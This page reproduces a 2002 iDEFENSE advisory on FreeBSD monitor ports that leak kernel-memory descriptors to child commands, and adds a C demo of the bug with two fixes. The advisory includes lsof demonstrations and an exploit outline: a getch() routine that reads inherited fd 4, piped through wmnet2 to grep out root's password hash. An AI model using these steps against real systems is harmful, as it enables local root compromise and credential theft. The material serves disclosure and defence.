idefense.libkvm.txt

Reported 17 Sep 2002 by jaguar. Source: packetstorm (packetstormsecurity.com)

FreeBSD ports libkvm vulnerabilities allow local root access via open file descriptors.

Code
`iDEFENSE Security Advisory 09.16.2002   
FreeBSD Ports libkvm Security Vulnerabilities  
  
  
DESCRIPTION  
  
The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2   
can be locally manipulated to take advantage of open file   
descriptors to /dev/mem and /dev/kmem to gain root privileges   
on a target host. These five programs are installed setgid   
kmem by default. They drop the kmem group privilege before   
executing user-specified commands, but the descriptors to   
/dev/mem and /dev/kmem, which libkvm opened while the program   
still held that privilege, stay open and are inherited by the   
child. This can lead to a local root compromise in various   
ways (e.g. an attacker can scan kernel memory for the contents   
of the master password file, /etc/master.passwd, which holds   
the root password hash).  
  
  
ANALYSIS  
  
The latest versions of all five above mentioned FreeBSD ports   
are vulnerable; the following examples illustrate the problem.   
In each case a dummy command started by the monitor still holds   
read-only descriptors on /dev/mem and /dev/kmem, as lsof shows   
(columns: COMMAND, PID, USER, FD, TYPE, DEVICE, SIZE/OFF, NODE,   
NAME):   
  
bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"  
  
dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem  
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem  
  
  
bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"  
  
dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem  
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem  
  
  
bash-2.05a$ cat .wmmonrc   
left "/home/dim/dummy"   
bash-2.05a$ wmmon &   
[1] 793   
bash-2.05a$ Monitoring 5 devices for activity.   
current stat is :1   
  
bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem   
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem   
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem   
  
  
bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"  
wmnet: using kmem driver to monitor ec0  
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem  
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem   
  
  
One possible exploit for these vulnerabilities is to replace   
the getch() routine of strings(1) with a version that reads   
from the inherited kernel memory descriptor (fd 4, which the   
lsof output above shows is /dev/mem under bubblemon and ascpu   
and /dev/kmem under wmmon and wmnet2; both expose the kernel's   
buffer cache):   
  
#include <stdio.h>  
#include <unistd.h>  
  
/* Read one byte from fd 4, the kernel memory descriptor  
 * inherited from the setgid-kmem parent; EOF ends the scan. */  
int getch()  
{  
	unsigned char c;  
	if (read(4, &c, 1) != 1)  
		return EOF;  
	return c;  
}  
  
or a similar, less CPU-expensive routine that reads from the   
inherited descriptor, build the result as "exploit", and run   
it through one of the affected programs, e.g.:  
  
wmnet2 -e exploit | grep root | grep Charlie   
  
(root's master.passwd entry on a default FreeBSD install   
carries the GECOS name "Charlie &", so the match is the line   
with the root password hash.)  
  
  
DETECTION  
  
The latest copies of asmon, ascpu, bubblemon, wmmon, and   
wmnet2 from the FreeBSD ports collection are vulnerable; they   
were tested on FreeBSD 4.6-RELEASE. According to FreeBSD, any   
port that uses libkvm, on releases up to and including   
4.6.2-RELEASE, may also be vulnerable.  
  
  
WORKAROUND  
  
Remove the setgid bit from the affected applications. This   
disables the monitoring features that need kmem access, but   
a program that never held the kmem group cannot leak a kmem   
descriptor:   
   
chmod g-s /path/to/wmnet2   
   
Repeat for asmon, ascpu, bubblemon and wmmon.   
  
  
VENDOR RESPONSE  
  
The FreeBSD advisory to be released in coordination with this   
advisory is FreeBSD-SA-02:39.libkvm. FreeBSD has provided  
the following patch details:  
  
"Upgrade your vulnerable system to 4.6-STABLE; or to the   
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated   
after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20,   
or 4.4-RELEASE-p27)."  
  
  
DISCLOSURE TIMELINE  
  
August 12, 2002 - Disclosed to iDEFENSE  
September 6, 2002 - Disclosed to FreeBSD Security  
September 6, 2002 - Disclosed to iDEFENSE clients  
September 16, 2002 - Coordinated public disclosure by FreeBSD  
and iDEFENSE  
  
  
CREDIT  
  
This issue was exclusively disclosed to iDEFENSE by   
[email protected]  
  
http://www.idefense.com/contributor.html  
  
  
  
David Endler, CISSP  
Director, Technical Intelligence  
iDEFENSE, Inc.  
14151 Newbrook Drive  
Suite 100  
Chantilly, VA 20151  
voice: 703-344-2632  
fax: 703-961-1071  
  
[email protected]  
www.idefense.com  
`
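The descriptor-inheritance pattern behind all five ports, shown as an added example in C (the language of the affected programs and of libkvm); this code is not part of the iDEFENSE advisory, the FreeBSD ports, or FreeBSD's libkvm fix, which the page does not include. A process opens a privileged descriptor, drops its group privilege, then forks and execs a user-supplied command, and the child still holds the descriptor. Opening /dev/mem requires group kmem, so an unlinked temp file (constructed here) stands in for it; the probe command `: >&N` exits non-zero only when descriptor N is closed in the child. The two remedies shown, setting FD_CLOEXEC on the descriptor at open time and closing every descriptor above stderr in the child before exec, are the standard fixes for this class of bug and are presented as such, not as the vendor's patch.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the kmem descriptor. A setgid-kmem monitor would get
 * open("/dev/mem", O_RDONLY) from libkvm; that needs group kmem, so
 * this demo uses a constructed, unlinked temp file instead. */
static int open_kmem_standin(void)
{
    char path[] = "/tmp/kmem-demo-XXXXXX";   /* constructed, not /dev/mem */
    int fd = mkstemp(path);
    if (fd < 0) {
        perror("mkstemp");
        exit(1);
    }
    unlink(path);
    if (fd < 3) {                  /* keep it above stdio, as in the lsof output */
        int hi = fcntl(fd, F_DUPFD, 3);
        close(fd);
        fd = hi;
    }
    return fd;
}

/* Fork and run a user-supplied command through /bin/sh, as `wmnet2 -e`
 * and `ascpu -exe` do. The command probes descriptor `fd`: the special
 * builtin `:` with redirection `>&N` exits non-zero when N is not open.
 * Returns 1 if the child inherited the descriptor, 0 if it did not.
 * With close_in_child set, the child closes every descriptor above
 * stderr before exec (closefrom(3) on FreeBSD 8+ and glibc 2.34+ does
 * the same in one call). */
static int exec_probe(int fd, int close_in_child)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, "exec 2>/dev/null; : >&%d", fd);

    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(1);
    }
    if (pid == 0) {
        /* The affected ports call setgid() here. Dropping the kmem group
         * changes nothing about descriptors that are already open. */
        if (close_in_child) {
            long max = sysconf(_SC_OPEN_MAX);
            if (max < 0 || max > 65536)
                max = 65536;
            for (long i = 3; i < max; i++)
                close((int)i);
        }
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* The pattern the advisory describes: open, drop privileges, exec.
 * Returns 1: the child still holds the descriptor. */
int demo_vulnerable(void)
{
    int fd = open_kmem_standin();
    int leaked = exec_probe(fd, 0);
    close(fd);
    return leaked;
}

/* Fix 1: flag the descriptor close-on-exec as soon as it is opened.
 * Returns 0: execve() closed it before the shell started. */
int demo_fixed_cloexec(void)
{
    int fd = open_kmem_standin();
    if (fcntl(fd, F_SETFD, FD_CLOEXEC) < 0) {
        perror("fcntl");
        exit(1);
    }
    int leaked = exec_probe(fd, 0);
    close(fd);
    return leaked;
}

/* Fix 2: close everything above stderr in the child before exec.
 * Returns 0. This is the option when a library the caller cannot
 * change (libkvm here) owns the descriptor. */
int demo_fixed_close_in_child(void)
{
    int fd = open_kmem_standin();
    int leaked = exec_probe(fd, 1);
    close(fd);
    return leaked;
}

int main(void)
{
    printf("open/drop/exec, no fix: child inherits fd = %d\n", demo_vulnerable());
    printf("FD_CLOEXEC at open    : child inherits fd = %d\n", demo_fixed_cloexec());
    printf("close fds in child    : child inherits fd = %d\n", demo_fixed_close_in_child());
    return 0;
}
```

Running the first case and then `lsof` on the child, as the advisory does with its dummy command, would list the temp file on the inherited descriptor; in the other two cases the child's descriptor table stops at stderr. The FD_CLOEXEC variant is the one to prefer in the library that opens the file, since it protects every caller that later execs anything.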

Vulners AI Score: 7.4 (High risk)